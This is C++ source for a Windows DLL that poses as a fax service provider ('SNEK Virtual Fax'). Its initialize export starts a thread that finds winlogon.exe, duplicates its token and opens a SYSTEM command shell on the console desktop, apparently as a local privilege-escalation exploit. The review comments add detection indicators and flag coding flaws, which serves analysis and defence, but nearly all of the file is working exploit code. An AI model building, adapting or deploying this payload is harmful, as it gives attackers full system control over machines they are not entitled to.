#include <windows.h>
#include <wtsapi32.h>
#include <userenv.h>
#include <tlhelp32.h>
#include <stdio.h>
#pragma comment(lib, "wtsapi32.lib")
#pragma comment(lib, "userenv.lib")
// Appends one formatted line to the fixed log file and returns; if the file cannot be opened the
// message is dropped silently. fmt is a wide printf-style format consumed by vfwprintf.
// NOTE(review): the path is hard-coded under C:\Users\Public, so the log is a stable, world-readable
// file-system artifact of this module and a useful triage/detection indicator.
void log(const wchar_t* fmt, ...) {
    FILE* out = _wfopen(L"C:\\Users\\Public\\faxp.log", L"a+");
    if (!out) {
        return;
    }
    va_list args;
    va_start(args, fmt);
    vfwprintf(out, fmt, args);
    va_end(args);
    // Line terminator is written separately so fmt never needs to carry it.
    fwprintf(out, L"\n");
    fclose(out);
}
// Returns the PID of the winlogon.exe instance running in terminal session `sid`, or 0 when no such
// process is found or the process snapshot cannot be taken.
// NOTE(review): from a detection standpoint this is the targeting step — a Toolhelp process walk that
// singles out winlogon.exe by image name and session id, immediately followed (in trig) by a handle
// open on that PID.
DWORD gwid(DWORD sid) {
DWORD pid = 0;
// Snapshot of all processes; this API reports failure as INVALID_HANDLE_VALUE, not NULL.
HANDLE hs = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hs != INVALID_HANDLE_VALUE) {
// Brace-init sets the leading dwSize member (required before Process32FirstW) and zeroes the rest.
PROCESSENTRY32W pe = { sizeof(pe) };
if (Process32FirstW(hs, &pe)) {
do {
// Case-insensitive match on the image file name only.
if (_wcsicmp(pe.szExeFile, L"winlogon.exe") == 0) {
DWORD s;
// `s` is only read when ProcessIdToSessionId succeeded, so it is never read uninitialized.
if (ProcessIdToSessionId(pe.th32ProcessID, &s) && s == sid) {
pid = pe.th32ProcessID;
break; // first winlogon.exe in the requested session wins
}
}
} while (Process32NextW(hs, &pe));
}
CloseHandle(hs);
}
return pid;
}
// Worker thread body started from FaxDevInitialize. Locates winlogon.exe in the active console session,
// duplicates its token as a primary token and uses it to start cmd.exe on the console desktop.
// lpParam is unused. Always returns 0; every failure path only writes a line to the log.
// NOTE(review): detection surface visible in this block — a handle opened on winlogon.exe from a
// non-interactive host (Sysmon Event ID 10 / ProcessAccess), a token duplication from that process,
// and a cmd.exe child (Security 4688 / Sysmon Event ID 1) whose parent is this DLL's host process
// rather than an interactive logon. Mitigation sits upstream of this code: whatever loads this DLL
// into a process that can read winlogon's token — presumably the Fax service, given the FaxDev*
// exports — is the control point to monitor.
DWORD WINAPI trig(LPVOID lpParam) {
log(L"trig: System exploit started.");
// 0xFFFFFFFF means no session is attached to the console; session 1 is then assumed.
DWORD sid = WTSGetActiveConsoleSessionId();
if (sid == 0xFFFFFFFF) sid = 1;
log(L"Target Session: %lu", sid);
DWORD pid = gwid(sid);
if (!pid) { log(L"Winlogon not found in session %lu", sid); return 0; }
log(L"Winlogon PID: %lu", pid);
// The process handle is only used for OpenProcessToken below.
HANDLE hp = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, pid);
if (!hp) { log(L"OpenProcess(winlogon) failed: %lu", GetLastError()); return 0; }
HANDLE ht = NULL;
if (OpenProcessToken(hp, TOKEN_DUPLICATE | TOKEN_ASSIGN_PRIMARY | TOKEN_QUERY, &ht)) {
HANDLE hdt = NULL;
// The duplicate is requested as a primary token (TokenPrimary), which is what CreateProcessAsUserW consumes.
if (DuplicateTokenEx(ht, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, &hdt)) {
STARTUPINFOW si = { sizeof(si) };
PROCESS_INFORMATION pi = { 0 };
// Interactive desktop of the console session. The cast drops const from a string literal; the
// API does not write through lpDesktop, so this is tolerated rather than correct.
si.lpDesktop = (LPWSTR)L"winsta0\\default";
LPVOID pe = NULL;
// Return value is not checked: on failure pe stays NULL and the child inherits this process's environment.
CreateEnvironmentBlock(&pe, hdt, FALSE);
// Writable array (not a literal pointer) because the W variant may modify the command-line buffer.
wchar_t c[] = L"C:\\Windows\\System32\\cmd.exe /k echo SNEK ERIS: SYSTEM SHELL RECOVERED";
if (CreateProcessAsUserW(hdt, NULL, c, NULL, NULL, FALSE,
NORMAL_PRIORITY_CLASS | CREATE_NEW_CONSOLE | CREATE_UNICODE_ENVIRONMENT,
pe, NULL, &si, &pi)) {
log(L"SUCCESS! Shell PID %lu", pi.dwProcessId);
// Only the handles are closed; the child keeps running.
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
} else {
log(L"CreateProcessAsUserW failed: %lu", GetLastError());
}
if (pe) DestroyEnvironmentBlock(pe);
CloseHandle(hdt);
} else {
log(L"DuplicateTokenEx failed: %lu", GetLastError());
}
CloseHandle(ht);
} else {
log(L"OpenProcessToken failed: %lu", GetLastError());
}
CloseHandle(hp);
return 0;
}
extern "C" {
// Exported initialization entry point (the FaxDev* naming suggests a Fax Service Provider interface).
// Performs no provider initialization; it starts trig on a new thread so the payload runs
// asynchronously to the host's own startup and returns TRUE immediately. All parameters are unused.
// NOTE(review): the thread handle returned by CreateThread is neither stored nor closed (handle leak),
// and a NULL return from CreateThread is not checked. For defenders, a DLL whose initialize export
// spawns a thread and nothing else is itself a recognizable anomaly.
__declspec(dllexport) BOOL WINAPI FaxDevInitialize(HINSTANCE h, HANDLE hp, void* lc, void* sc) {
log(L"FaxDevInitialize: Triggering payload.");
CreateThread(NULL, 0, trig, NULL, 0, NULL);
return TRUE;
}
// Reports one virtual device to the host: count 1, name "SNEK Virtual Fax", id prefix 0x1337.
// cp and ck are unused. Always returns TRUE.
// NOTE(review): wcscpy writes into the caller-supplied dnp with no bound — the buffer size is not known
// here, so correctness depends entirely on the host's buffer being large enough. dc and dip are
// dereferenced without a NULL check. The device name is a fixed string artifact of this binary.
__declspec(dllexport) BOOL WINAPI FaxDevVirtualDeviceCreation(PDWORD dc, LPWSTR dnp, PDWORD dip, HANDLE cp, ULONG_PTR ck) {
*dc = 1; wcscpy(dnp, L"SNEK Virtual Fax"); *dip = 0x1337; return TRUE;
}
// Job-start stub: hands back a constant non-NULL pseudo-handle through fh so the host treats the job
// as opened. No state is allocated. fh is written without a NULL check; other parameters are unused.
// Always returns TRUE.
__declspec(dllexport) BOOL WINAPI FaxDevStartJob(HANDLE lh, DWORD di, PHANDLE fh, HANDLE cp, ULONG_PTR ck)
{
    (void)lh; (void)di; (void)cp; (void)ck;
    *fh = (HANDLE)1;
    return TRUE;
}
// Job-end stub. FaxDevStartJob allocates nothing, so there is nothing to release; always returns TRUE.
__declspec(dllexport) BOOL WINAPI FaxDevEndJob(HANDLE fh)
{
    (void)fh;
    return TRUE;
}
// Send stub: reports success without transmitting anything. All parameters are unused.
__declspec(dllexport) BOOL WINAPI FaxDevSend(HANDLE fh, void* fs, void* fst)
{
    (void)fh; (void)fs; (void)fst;
    return TRUE;
}
// Receive stub: reports success without receiving anything. All parameters are unused.
__declspec(dllexport) BOOL WINAPI FaxDevReceive(HANDLE fh, HANDLE ch, void* fr)
{
    (void)fh; (void)ch; (void)fr;
    return TRUE;
}
// Status stub: writes the constant 48 through fsr when it is non-NULL (presumably the required-size
// out-parameter — confirm against the host's contract) and never touches the status buffer fst.
// Always returns TRUE.
__declspec(dllexport) BOOL WINAPI FaxDevReportStatus(HANDLE fh, void* fst, DWORD fss, PDWORD fsr)
{
    (void)fh; (void)fst; (void)fss;
    if (fsr != NULL) {
        *fsr = 48;
    }
    return TRUE;
}
// Abort stub: nothing is in flight, so there is nothing to cancel; always returns TRUE.
__declspec(dllexport) BOOL WINAPI FaxDevAbortOperation(HANDLE fh)
{
    (void)fh;
    return TRUE;
}
}
// DLL entry point: does nothing on any reason code. All activity is deferred to FaxDevInitialize,
// so a simple DllMain hook would not observe the payload; monitor the exported initialize path instead.
BOOL WINAPI DllMain(HINSTANCE h, DWORD r, LPVOID res)
{
    (void)h; (void)r; (void)res;
    return TRUE;
}